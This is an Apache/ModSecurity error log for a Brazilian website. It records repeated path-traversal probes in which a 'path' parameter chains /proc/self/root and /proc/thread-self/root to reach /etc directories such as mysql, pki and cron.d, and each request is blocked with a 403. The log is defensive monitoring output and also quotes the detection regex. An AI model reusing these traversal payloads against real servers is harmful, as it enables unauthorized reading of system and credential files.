[Wed Mar 18 14:55:32.743006 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:48182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnFAbLMZ6AikZjR9XryAAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:34.098973 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:48184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnFta6ubjKNq_cu4bKnwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:34.367454 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:45142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnFsdf6f5d65gmYZQBWAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:55:35.414962 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:48198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnF-oXxyEfFpUF8f-fzAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:36.707026 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:48206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnGOoXxyEfFpUF8f-fzgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:55:42.725915 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 66.249.74.169:50893] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:55:43.352378 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:52890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnH-oXxyEfFpUF8f-f2gAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:55:58.776052 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:59322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnLta6ubjKNq_cu4bKxgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:00.143526 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:56984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnMOyqAr6etmhZHNr1MAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:01.505320 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:56986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnMUzinOy1jxa1j4dHbwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:03.242076 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.241.31:57002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnM0zinOy1jxa1j4dHcAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:05.262811 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:57018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnNOoXxyEfFpUF8f-f7wAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:08.058898 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:57024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnOEzinOy1jxa1j4dHeQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:09.362534 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:34456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnOUzinOy1jxa1j4dHegAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:10.762890 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:34472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnOta6ubjKNq_cu4bKywAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:12.146472 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:34488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnPPu8EFLIOrSqIpsttwAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:13.487454 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:34504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnPeoXxyEfFpUF8f-f9gAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:15.927229 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:34516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnP9a6ubjKNq_cu4bK0AAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:17.224672 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:34522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnQcdf6f5d65gmYZQBewAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:18.540393 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:41558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnQgkwaGbbGflqUZA_agAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:19.969604 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:41570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnQ-w_le52K8_3pV0JCgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:22.329343 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:41580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnReyqAr6etmhZHNr1OQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
